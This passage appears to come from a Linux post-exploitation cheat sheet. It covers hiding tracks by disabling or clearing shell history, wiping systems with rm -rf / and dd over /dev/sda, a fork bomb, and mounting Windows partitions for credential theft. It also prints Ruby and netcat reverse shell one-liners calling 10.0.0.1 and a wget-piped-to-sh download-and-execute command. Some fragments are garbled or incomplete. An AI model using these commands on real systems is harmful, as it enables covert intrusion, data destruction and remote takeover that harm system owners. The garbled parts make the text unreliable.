Also, check http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
Covering Your Tracks
Avoiding history filesmys
export HISTFILE= or
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.
However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes. clear all history in ram
Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
Deleting and Destroying
If it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles. Oh, and you’re probably a jerk if you use any of the stuff below.
Description and/or Reason
rm -rf /
This will recursively try to delete all files
Reformat the device mentioned, making recovery of files hard
dd if=/dev/zero of=/dev/sda bs=1M
Overwrite disk /dev/sda with zeros
Hex version of rm -rf / (How is this supposed to work?)
Fork Bomb: The [in]famous “fork bomb”. This command will cause your system to run a large number of processes, until it “hangs”. This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i; exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
wget http://server/file.sh -O- | sh This command forces the download of a file and immediately its execution
Fun if Windows is present and accessible
If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.